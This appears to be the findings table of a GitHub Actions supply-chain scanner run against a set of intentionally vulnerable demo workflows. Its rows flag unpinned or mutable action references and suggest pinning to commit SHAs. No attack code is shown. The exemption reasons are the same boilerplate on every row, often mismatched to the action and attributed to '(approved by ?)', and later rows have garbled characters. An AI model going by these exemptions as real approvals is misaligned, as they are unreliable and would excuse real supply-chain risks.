| 🔶 MEDIUM | SCA-033 | Mutable tag reference: Checkmarx/kics-github-action@v2<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | vulnerable-workflows/19-teampcp-indicators.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: actions/checkout@v4<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | vulnerable-workflows/19-teampcp-indicators.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: org-name/shared-workflows/.github/workflows/deploy.yml@main<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | vulnerable-workflows/25-reusable-workflow-attacks.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: external-security-org/scanners/.github/workflows/sast.yml@v2<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | vulnerable-workflows/25-reusable-workflow-attacks.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: org-name/shared-workflows/.github/workflows/build.yml@main<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | vulnerable-workflows/25-reusable-workflow-attacks.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: actions/checkout@v4<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | vulnerable-workflows/25-reusable-workflow-attacks.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: org-name/shared-workflows/.github/workflows/release.yml@main<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | vulnerable-workflows/25-reusable-workflow-attacks.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: actions/checkout@v4<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | vulnerable-workflows/05-cache-poisoning.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: actions/cache@v3<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | vulnerable-workflows/05-cache-poisoning.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: actions/cache@v3<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | vulnerable-workflows/05-cache-poisoning.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: actions/checkout@v4<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | vulnerable-workflows/27-oidc-token-abuse.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: aws-actions/configure-aws-credentials@v4<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | vulnerable-workflows/27-oidc-token-abuse.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: actions/checkout@v4<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | vulnerable-workflows/23-self-hosted-runner.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ⚠️ HIGH | SCA-051 | Action without version pin: super-linter/super-linter<br>compromised_actions → Exempted: Own first-party action from same organization (approved by ?) | vulnerable-workflows/23-self-hosted-runner.yml | Always pin actions to a specific commit SHA. |
| ⚠️ HIGH | SCA-051 | Action without version pin: peaceiris/actions-gh-pages<br>compromised_actions → Exempted: Own first-party action from same organization (approved by ?) | vulnerable-workflows/23-self-hosted-runner.yml | Always pin actions to a specific commit SHA. |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: aquasecurity/trivy-action@master<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | vulnerable-workflows/23-self-hosted-runner.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: actions/checkout@v4<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | vulnerable-workflows/23-self-hosted-runner.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: actions/checkout@v4<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | vulnerable-workflows/21-ai-credential-exposure.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: actions/checkout@v4<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | vulnerable-workflows/29-dependency-confusion.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: actions/checkout@v4<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | vulnerable-workflows/11-artifact-poisoning.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: actions/upload-artifact@v4<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | vulnerable-workflows/11-artifact-poisoning.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: actions/download-artifact@v4<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | vulnerable-workflows/11-artifact-poisoning.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: actions/checkout@v4<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | vulnerable-workflows/03-secret-exposure.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: actions/checkout@v4<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | vulnerable-workflows/15-behavioral-obfuscation.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: actions/checkout@v4<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | vulnerable-workflows/13-binary-dropper.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: actions/checkout@v4<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | vulnerable-workflows/24-output-injection.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: actions/github-script@v7<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | vulnerable-workflows/24-output-injection.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: actions/checkout@v4<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | vulnerable-workflows/28-artifact-attacks.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: actions/upload-artifact@v4<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | vulnerable-workflows/28-artifact-attacks.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: actions/upload-artifact@v4<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | vulnerable-workflows/28-artifact-attacks.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: actions/checkout@v4<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | vulnerable-workflows/01-compromised-action.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: actions/cache@v3<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | vulnerable-workflows/01-compromised-action.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: actions/checkout@v4<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | vulnerable-workflows/34-network-egress-anomaly.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: actions/checkout@v4<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | vulnerable-workflows/02-pwn-request.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: actions/checkout@v4<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | vulnerable-workflows/22-polyfill-cdn-attack.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: random-external-org/shared-workflows/.github/workflows/scan.yml@main<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | vulnerable-workflows/12-reusable-workflow-trust.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| 🔶 MEDIUM | SCA-033 | Mutable tag reference: actions/checkout@v4<br>compromised_actions → Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) | vulnerable-workflows/06-permission-escalation.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: actions/checkout@v4
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/06-permission-escalation.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ถ MEDIUM | SCA-033 |
Mutable tag reference: actions/checkout@v4
compromised_actions โ Exempted: Own action - mutable tag v4 is intentional for showcase pipeline (approved by ?) |
vulnerable-workflows/06-permission-escalation.yml | Pin to a full commit SHA: uses: owner/action@<40-char-sha> # version comment |
| ๐ฌ INFO | SCA-051 |
Third-party action: anshumaan-10/supply-chain-guardian
workflow_analysis โ Exempted: Own first-party action from same organization (approved by ?) |
.github/workflows/showcase-pipeline.yml | Review the action's source code. Check its stars, maintainer, and update history. |
| ๐ฌ INFO | SCA-051 |
Third-party action: anshumaan-10/supply-chain-guardian
workflow_analysis โ Exempted: Own first-party action from same organization (approved by ?) |
.github/workflows/showcase-pipeline.yml | Review the action's source code. Check its stars, maintainer, and update history. |
| ๐ฌ INFO | SCA-051 |
Third-party action: anshumaan-10/supply-chain-guardian
workflow_analysis โ Exempted: Own first-party action from same organization (approved by ?) |
.github/workflows/showcase-pipeline.yml | Review the action's source code. Check its stars, maintainer, and update history. |
| ๐ฌ INFO | SCA-051 |
Third-party action: anshumaan-10/supply-chain-guardian
workflow_analysis โ Exempted: Own first-party action from same organization (approved by ?) |
.github/workflows/showcase-pipeline.yml | Review the action's source code. Check its stars, maintainer, and update history. |
| ๐ฌ INFO | SCA-051 |
Third-party action: anshumaan-10/supply-chain-guardian
workflow_analysis โ Exempted: Own first-party action from same organization (approved by ?) |
.github/workflows/showcase-pipeline.yml | Review the action's source code. Check its stars, maintainer, and update history. |
| ๐ฌ INFO | SCA-051 |
Third-party action: anshumaan-10/supply-chain-guardian
workflow_analysis โ Exempted: Own first-party action from same organization (approved by ?) |
.github/workflows/showcase-pipeline.yml | Review the action's source code. Check its stars, maintainer, and update history. |
| ๐ฌ INFO | SCA-051 |
Third-party action: aquasecurity/trivy-action
workflow_analysis โ Exempted: Own first-party action from same organization (approved by ?) |
vulnerable-workflows/19-teampcp-indicators.yml | Review the action's source code. Check its stars, maintainer, and update history. |
| ๐ฌ INFO | SCA-051 |
Third-party action: aquasecurity/setup-trivy
workflow_analysis โ Exempted: Own first-party action from same organization (approved by ?) |
vulnerable-workflows/19-teampcp-indicators.yml | Review the action's source code. Check its stars, maintainer, and update history. |
| ๐ฌ INFO | SCA-051 |
Third-party action: Checkmarx/kics-github-action
workflow_analysis โ Exempted: Own first-party action from same organization (approved by ?) |
vulnerable-workflows/19-teampcp-indicators.yml | Review the action's source code. Check its stars, maintainer, and update history. |
| ๐ฌ INFO | SCA-051 |
Third-party action: org-name/shared-workflows/.github/workflows/deploy.yml
workflow_analysis โ Exempted: Own first-party action from same organization (approved by ?) |
vulnerable-workflows/25-reusable-workflow-attacks.yml | Review the action's source code. Check its stars, maintainer, and update history. |
| ๐ฌ INFO | SCA-051 |
Third-party action: external-security-org/scanners/.github/workflows/sast.yml
workflow_analysis โ Exempted: Own first-party action from same organization (approved by ?) |
vulnerable-workflows/25-reusable-workflow-attacks.yml | Review the action's source code. Check its stars, maintainer, and update history. |
| ๐ฌ INFO | SCA-051 |
Third-party action: org-name/shared-workflows/.github/workflows/build.yml
workflow_analysis โ Exempted: Own first-party action from same organization (approved by ?) |
vulnerable-workflows/25-reusable-workflow-attacks.yml | Review the action's source code. Check its stars, maintainer, and update history. |
| ๐ฌ INFO | SCA-051 |
Third-party action: org-name/shared-workflows/.github/workflows/release.yml
workflow_analysis โ Exempted: Own first-party action from same organization (approved by ?) |
vulnerable-workflows/25-reusable-workflow-attacks.yml | Review the action's source code. Check its stars, maintainer, and update history. |
| ๐ฌ INFO | SCA-051 |
Third-party action: aquasecurity/trivy-action
workflow_analysis โ Exempted: Own first-party action from same organization (approved by ?) |
vulnerable-workflows/23-self-hosted-runner.yml | Review the action's source code. Check its stars, maintainer, and update history. |
| ๐ฌ INFO | SCA-051 |
Third-party action: psf/black
workflow_analysis โ Exempted: Own first-party action from same organization (approved by ?) |
vulnerable-workflows/23-self-hosted-runner.yml | Review the action's source code. Check its stars, maintainer, and update history. |
| ๐ฌ INFO | SCA-051 |
Third-party action: tj-actions/changed-files
workflow_analysis โ Exempted: Own first-party action from same organization (approved by ?) |
vulnerable-workflows/01-compromised-action.yml | Review the action's source code. Check its stars, maintainer, and update history. |
| ๐ฌ INFO | SCA-051 |
Third-party action: reviewdog/action-eslint
workflow_analysis โ Exempted: Own first-party action from same organization (approved by ?) |
vulnerable-workflows/01-compromised-action.yml | Review the action's source code. Check its stars, maintainer, and update history. |
| ๐ฌ INFO | SCA-051 |
Third-party action: random-external-org/shared-workflows/.github/workflows/scan.yml
workflow_analysis โ Exempted: Own first-party action from same organization (approved by ?) |
vulnerable-workflows/12-reusable-workflow-trust.yml | Review the action's source code. Check its stars, maintainer, and update history. |
| ๐ฌ INFO | SCA-051 |
Third-party action: another-org/deploy-workflows/.github/workflows/deploy.yml
workflow_analysis โ Exempted: Own first-party action from same organization (approved by ?) |
vulnerable-workflows/12-reusable-workflow-trust.yml | Review the action's source code. Check its stars, maintainer, and update history. |